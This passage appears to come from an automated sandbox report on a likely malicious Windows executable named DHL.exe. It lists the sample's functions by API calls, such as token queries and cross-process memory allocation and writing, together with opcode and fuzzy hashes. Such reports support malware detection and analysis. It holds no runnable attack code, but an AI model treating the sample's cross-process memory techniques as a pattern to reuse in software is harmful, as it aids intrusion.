                                                        • Opcode Fuzzy Hash: 7e61073a26abceeacd4f4baa31d215965b2a855024de1bd63e7e6270a3840d63
                                                        • Instruction Fuzzy Hash: EC01F9365C56006BC61267B46C45E2B276DABF13B2725C927F465A3392EA74CC024130
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?,?,?,00A0035E), ref: 00A0002B
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?,?), ref: 00A00046
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?,?), ref: 00A00054
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?), ref: 00A00064
                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?,?), ref: 00A00070
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: c92ceeab9a5d94345068a1e9671d3aeaf8d1c83d09d5b708201bc23927b21e30
                                                        • Instruction ID: a67310d6545aac5416381102b46f8dbb0f9181ed5bc1a7204836b0d85b6b3824
                                                        • Opcode Fuzzy Hash: c92ceeab9a5d94345068a1e9671d3aeaf8d1c83d09d5b708201bc23927b21e30
                                                        • Instruction Fuzzy Hash: 9C01A276600208BFDB108FA8EC48FAA7EFDEF44762F144124F905E6250EB71DE418BA0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00A0E997
                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 00A0E9A5
                                                        • Sleep.KERNEL32(00000000), ref: 00A0E9AD
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00A0E9B7
                                                        • Sleep.KERNEL32 ref: 00A0E9F3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 9e2d4fcdb051e4f7d7119933f78ddb1b3265174c22e1261f93af0956516ac8f1
                                                        • Instruction ID: b0fd0d0ccb6e2ea709ab529c9170f8f78fa62241c0e264ac7980a4524313d783
                                                        • Opcode Fuzzy Hash: 9e2d4fcdb051e4f7d7119933f78ddb1b3265174c22e1261f93af0956516ac8f1
                                                        • Instruction Fuzzy Hash: D9011731C0162DDBCF00EBE5ED59AEDFB78BB09751F000A56E502B2291CB309665ABA1
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A01114
                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A01120
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A0112F
                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A01136
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A0114D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: b6114168e067481358b25bfbe815d901f72d0e0c731f93760255480da0999105
                                                        • Instruction ID: 215ec4bcc160a3a03188c730747444aceb355de487d995ff12a6f2ecf3123a2e
                                                        • Opcode Fuzzy Hash: b6114168e067481358b25bfbe815d901f72d0e0c731f93760255480da0999105
                                                        • Instruction Fuzzy Hash: 82016D75500215BFDB158FA4EC49AAA3B6EEF85364B100418FA41D7350DA31DC019B60
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A00FCA
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A00FD6
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A00FE5
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A00FEC
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A01002
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: c16ffcd53ed580b2cdb7334635977aea0269aa82f4ab66758dc29ba95463b61d
                                                        • Instruction ID: 822eec13bcb32f91cfddb3452de56a504175e9170193b964728dafcbac03a15e
                                                        • Opcode Fuzzy Hash: c16ffcd53ed580b2cdb7334635977aea0269aa82f4ab66758dc29ba95463b61d
                                                        • Instruction Fuzzy Hash: F9F06235200315EBD7218FE4EC4DF963B6DEF8A761F104414F946D7291CA70DC518B60
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A0102A
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A01036
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A01045
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A0104C
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A01062
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 01dbe958461581b16f29648c590600a477fb5d1c0851ffbfb1675835394a9dad
                                                        • Instruction ID: 08f0555776a67740a8fbf4f1dd087d11813d7e8984e807a67127a782e7c94ce3
                                                        • Opcode Fuzzy Hash: 01dbe958461581b16f29648c590600a477fb5d1c0851ffbfb1675835394a9dad
                                                        • Instruction Fuzzy Hash: C6F06D35200315EBDB219FE4EC49F963BADEF8A761F500424FA85E7290CA70D8518B60
                                                        APIs
                                                        • CloseHandle.KERNEL32(?,?,?,?,00A1017D,?,00A132FC,?,00000001,009E2592,?), ref: 00A10324
                                                        • CloseHandle.KERNEL32(?,?,?,?,00A1017D,?,00A132FC,?,00000001,009E2592,?), ref: 00A10331
                                                        • CloseHandle.KERNEL32(?,?,?,?,00A1017D,?,00A132FC,?,00000001,009E2592,?), ref: 00A1033E
                                                        • CloseHandle.KERNEL32(?,?,?,?,00A1017D,?,00A132FC,?,00000001,009E2592,?), ref: 00A1034B
                                                        • CloseHandle.KERNEL32(?,?,?,?,00A1017D,?,00A132FC,?,00000001,009E2592,?), ref: 00A10358
                                                        • CloseHandle.KERNEL32(?,?,?,?,00A1017D,?,00A132FC,?,00000001,009E2592,?), ref: 00A10365
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: fee9a078a1e7f0cc81891a872d6d8bfbd109c7becec7cd422b2b348aa07a0c8d
                                                        • Instruction ID: a9c38ad2ee644f4cf43ecd23981cdd3615aea5953d6fc16d2080ba475a1eb64f
                                                        • Opcode Fuzzy Hash: fee9a078a1e7f0cc81891a872d6d8bfbd109c7becec7cd422b2b348aa07a0c8d
                                                        • Instruction Fuzzy Hash: C401AA72800B159FCB30AF66D880852FBF9BF603153158A3FD1A696931C3B1A999DF80
                                                        APIs
                                                        • _free.LIBCMT ref: 009DD752
                                                          • Part of subcall function 009D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000), ref: 009D29DE
                                                          • Part of subcall function 009D29C8: GetLastError.KERNEL32(00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000,00000000), ref: 009D29F0
                                                        • _free.LIBCMT ref: 009DD764
                                                        • _free.LIBCMT ref: 009DD776
                                                        • _free.LIBCMT ref: 009DD788
                                                        • _free.LIBCMT ref: 009DD79A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 0cdb25cad5272556cd0bf3d69eb1197ddde68222a8c3be1531adb5231634c20e
                                                        • Instruction ID: c9981ad142ae399655108d943a524061fa9745504828107521025b1475c6b173
                                                        • Opcode Fuzzy Hash: 0cdb25cad5272556cd0bf3d69eb1197ddde68222a8c3be1531adb5231634c20e
                                                        • Instruction Fuzzy Hash: ACF036725C5204ABC625EBA4FAC5D2677EDBB94760B948C47F098E7701C774FC808A64
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A05C58
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A05C6F
                                                        • MessageBeep.USER32(00000000), ref: 00A05C87
                                                        • KillTimer.USER32(?,0000040A), ref: 00A05CA3
                                                        • EndDialog.USER32(?,00000001), ref: 00A05CBD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 2e929e17738f625ef51fc9912800ea5a0c69a0ceac842e157eedd209843af4b8
                                                        • Instruction ID: 88455242aad572428b48efd5564458eec9a81cf7571af11aa67225d65cda4847
                                                        • Opcode Fuzzy Hash: 2e929e17738f625ef51fc9912800ea5a0c69a0ceac842e157eedd209843af4b8
                                                        • Instruction Fuzzy Hash: AF018631900B08ABFB259B60ED4FFA67BB8BB01B05F041559B583B10E1DBF4A9858F90
                                                        APIs
                                                        • _free.LIBCMT ref: 009D22BE
                                                          • Part of subcall function 009D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000), ref: 009D29DE
                                                          • Part of subcall function 009D29C8: GetLastError.KERNEL32(00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000,00000000), ref: 009D29F0
                                                        • _free.LIBCMT ref: 009D22D0
                                                        • _free.LIBCMT ref: 009D22E3
                                                        • _free.LIBCMT ref: 009D22F4
                                                        • _free.LIBCMT ref: 009D2305
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 602240bd574ed9c4afe9374410e1172243924708debc51e22e842135fffd9ae7
                                                        • Instruction ID: 309898fa5a297164436dee78f3d5aa69daf2a8a480364d0db7c5fb43bcbd541b
                                                        • Opcode Fuzzy Hash: 602240bd574ed9c4afe9374410e1172243924708debc51e22e842135fffd9ae7
                                                        • Instruction Fuzzy Hash: 35F03A748801208BC622EFE8BD11D583BA8B728760700C55BF418D33B2CB700893BFE4
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 009B95D4
                                                        • StrokeAndFillPath.GDI32(?,?,009F71F7,00000000,?,?,?), ref: 009B95F0
                                                        • SelectObject.GDI32(?,00000000), ref: 009B9603
                                                        • DeleteObject.GDI32 ref: 009B9616
                                                        • StrokePath.GDI32(?), ref: 009B9631
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: f5543266ba166829042c9a8d0e8c91188d50496e38cb194015e5827e0153f8f2
                                                        • Instruction ID: 16d8d1a1df1a00ccd540e56ed1fb810847f8d951a015410a961a9dbe9b8a826e
                                                        • Opcode Fuzzy Hash: f5543266ba166829042c9a8d0e8c91188d50496e38cb194015e5827e0153f8f2
                                                        • Instruction Fuzzy Hash: 6BF0B631015244EBDB26DFE9EE297A43BA5AB01332F44C214F669650F0C7748997DF20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: __freea$_free
                                                        • String ID: a/p$am/pm
                                                        • API String ID: 3432400110-3206640213
                                                        • Opcode ID: 2e32f7ed3d64ef54499ff942f1c4159f1584d9da6944eefc0bd6ab5a27042870
                                                        • Instruction ID: a32fa2da4d11fc53734c1c5843cc35171fb0a22b673c8af1e52bfdda30790793
                                                        • Opcode Fuzzy Hash: 2e32f7ed3d64ef54499ff942f1c4159f1584d9da6944eefc0bd6ab5a27042870
                                                        • Instruction Fuzzy Hash: EAD1F137984206EADB289F68C845BBEB7B9EF05300F24C51BE6119B751D3359D80CB91
                                                        APIs
                                                          • Part of subcall function 009C0242: EnterCriticalSection.KERNEL32(00A7070C,00A71884,?,?,009B198B,00A72518,?,?,?,009A12F9,00000000), ref: 009C024D
                                                          • Part of subcall function 009C0242: LeaveCriticalSection.KERNEL32(00A7070C,?,009B198B,00A72518,?,?,?,009A12F9,00000000), ref: 009C028A
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 009C00A3: __onexit.LIBCMT ref: 009C00A9
                                                        • __Init_thread_footer.LIBCMT ref: 00A27BFB
                                                          • Part of subcall function 009C01F8: EnterCriticalSection.KERNEL32(00A7070C,?,?,009B8747,00A72514), ref: 009C0202
                                                          • Part of subcall function 009C01F8: LeaveCriticalSection.KERNEL32(00A7070C,?,009B8747,00A72514), ref: 009C0235
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                        • String ID: 5$G$Variable must be of type 'Object'.
                                                        • API String ID: 535116098-3733170431
                                                        • Opcode ID: a738b0dcfd35f522d10a3f10eec39a2e8d6d9395e28926e997099311cc9ae0c7
                                                        • Instruction ID: 030b6635df73f56c2ac320f72ec73bb57eb5abcc65685216f3dbbeedd44a8837
                                                        • Opcode Fuzzy Hash: a738b0dcfd35f522d10a3f10eec39a2e8d6d9395e28926e997099311cc9ae0c7
                                                        • Instruction Fuzzy Hash: 56917D71A04219EFCB14EF58E991EBDB7B1FF45304F148069F8066B292DB71AE41CB51
                                                        APIs
                                                          • Part of subcall function 00A0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A021D0,?,?,00000034,00000800,?,00000034), ref: 00A0B42D
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A02760
                                                          • Part of subcall function 00A0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00A0B3F8
                                                          • Part of subcall function 00A0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00A0B355
                                                          • Part of subcall function 00A0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A02194,00000034,?,?,00001004,00000000,00000000), ref: 00A0B365
                                                          • Part of subcall function 00A0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A02194,00000034,?,?,00001004,00000000,00000000), ref: 00A0B37B
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A027CD
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A0281A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: 1fc249acea4da01aef632581538f4edc57156e682a7b177b019fcb079ec33459
                                                        • Instruction ID: 956ddbffe3b70bd0a5db16cf3e642efc0172b739872d43375e5707eb05268641
                                                        • Opcode Fuzzy Hash: 1fc249acea4da01aef632581538f4edc57156e682a7b177b019fcb079ec33459
                                                        • Instruction Fuzzy Hash: E8413B7690021CAFDB10DFA4DD46BEEBBB8AF09300F108095FA55B7181DB716E45CBA1
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL.exe,00000104), ref: 009D1769
                                                        • _free.LIBCMT ref: 009D1834
                                                        • _free.LIBCMT ref: 009D183E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user\Desktop\DHL.exe
                                                        • API String ID: 2506810119-1530727579
                                                        • Opcode ID: 7bdb8edf2d3902e9bb6e15fa8e47ee2bd50f42c23671186feb98b5947e763d09
                                                        • Instruction ID: 0ff1c4b8854db5f77014f41562b23c140505f09acc616ad4fd3a8afc814e2b6d
                                                        • Opcode Fuzzy Hash: 7bdb8edf2d3902e9bb6e15fa8e47ee2bd50f42c23671186feb98b5947e763d09
                                                        • Instruction Fuzzy Hash: B7315E76A80258BBDB21DB99DC85E9EBBFCEB95310B148167F804D7321D6708E81DB90
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A0C306
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00A0C34C
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A71990,00D965C0), ref: 00A0C395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem
                                                        • String ID: 0
                                                        • API String ID: 135850232-4108050209
                                                        • Opcode ID: 7b0f7bc74a1935438c8f1969f955a3d1432b40950031e76025d0aeb2a7a9d57c
